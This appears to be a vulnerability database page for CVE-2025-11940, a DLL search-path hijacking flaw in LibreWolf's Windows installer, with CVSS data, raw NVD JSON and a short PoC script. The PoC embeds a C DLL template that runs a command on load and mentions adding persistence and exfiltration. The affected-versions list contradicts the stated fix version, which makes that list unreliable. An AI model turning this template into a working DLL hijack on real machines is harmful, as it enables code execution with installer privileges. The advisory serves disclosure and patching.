Security Vulnerability Report
CVE-2025-11940 CVSS 7.0 HIGH

CVE-2025-11940

Published: 2025-10-19 09:15:33
Last Modified: 2026-04-15 00:35:42

Description

A security vulnerability has been detected in LibreWolf up to 143.0.4-1 on Windows. This affects an unknown function of the file assets/setup.nsi of the component Installer. Such manipulation leads to uncontrolled search path. The attack must be carried out locally. Attacks of this nature are highly complex. The exploitability is reported as difficult. Upgrading to version 144.0-1 mitigates this issue. The name of the patch is dd10e31dd873e9cb309fad8aed921d45bf905a55. It is suggested to upgrade the affected component.

CVSS Details

CVSS Score: 7.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

LibreWolf < 143.0.4-1
LibreWolf <= 144.0-1 (versions not upgraded)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11940 - LibreWolf Installer Uncontrolled Search Path Exploit
# This PoC demonstrates the DLL/executable hijacking concept in the LibreWolf installer
# Affected: LibreWolf <= 143.0.4-1 on Windows
# Component: assets/setup.nsi (NSIS Installer)
import os
import shutil


def exploit_setup():
    """
    PoC for CVE-2025-11940: Uncontrolled Search Path in LibreWolf Installer

    The vulnerability exists because the NSIS installer (setup.nsi) loads
    executables/DLLs from uncontrolled search paths. An attacker with local
    access can place malicious files in the search path to hijack execution.

    Steps:
    1. Identify the installation directory or current working directory
    2. Place a malicious executable/DLL with the same name as a legitimate
       dependency in a higher-priority search path
    3. Wait for the installer to be executed, triggering the hijacked code
    """
    # Step 1: Determine target installation directory
    install_dir = r"C:\Program Files\LibreWolf"

    # Step 2: Create a malicious DLL that mimics a legitimate dependency
    # The NSIS installer may search for utilities in the current directory first
    malicious_payload = '''
// Malicious DLL payload - compiled as a DLL
// When loaded by the installer, this executes with installer's privileges
#include <windows.h>
#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID lpReserved) {
    if (reason == DLL_PROCESS_ATTACH) {
        // Execute malicious code with installer privileges
        system("whoami > C:\\temp\\pwned.txt");
        // Add persistence, exfiltrate data, etc.
    }
    return TRUE;
}
'''

    # Step 3: Place malicious file in the search path
    # NSIS searches current directory before system directories
    target_dll = os.path.join(install_dir, "legitimate_dependency.dll")

    print(f"[*] CVE-2025-11940 PoC")
    print(f"[*] Target: LibreWolf Installer (setup.nsi)")
    print(f"[*] Affected versions: <= 143.0.4-1")
    print(f"[*] Patched version: 144.0-1")
    print(f"[*] Attack vector: Uncontrolled Search Path (DLL Hijacking)")
    print(f"[+] Place malicious DLL in: {target_dll}")
    print(f"[+] Wait for installer execution to trigger payload")


if __name__ == "__main__":
    exploit_setup()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11940", "sourceIdentifier": "[email protected]", "published": "2025-10-19T09:15:32.737", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in LibreWolf up to 143.0.4-1 on Windows. This affects an unknown function of the file assets/setup.nsi of the component Installer. Such manipulation leads to uncontrolled search path. The attack must be carried out locally. Attacks of this nature are highly complex. The exploitability is reported as difficult. Upgrading to version 144.0-1 mitigates this issue. The name of the patch is dd10e31dd873e9cb309fad8aed921d45bf905a55. It is suggested to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:C/I:C/A:C", "baseScore": 6.0, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 1.5, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-426"}, {"lang": "en", "value": "CWE-427"}]}], "references": [{"url": "https://codeberg.org/librewolf/bsys6/commit/dd10e31dd873e9cb309fad8aed921d45bf905a55", "source": "[email protected]"}, {"url": "https://codeberg.org/librewolf/bsys6/releases/tag/144.0-1", "source": "[email protected]"}, {"url": "https://github.com/Cyber-Wo0dy/report/blob/main/librewolf/143.0.4-1/librewolf_installer_exe_hijacking.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.329019", "source": 
"[email protected]"}, {"url": "https://vuldb.com/?id.329019", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.671575", "source": "[email protected]"}, {"url": "https://github.com/Cyber-Wo0dy/report/blob/main/librewolf/143.0.4-1/librewolf_installer_exe_hijacking.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://vuldb.com/?submit.671575", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}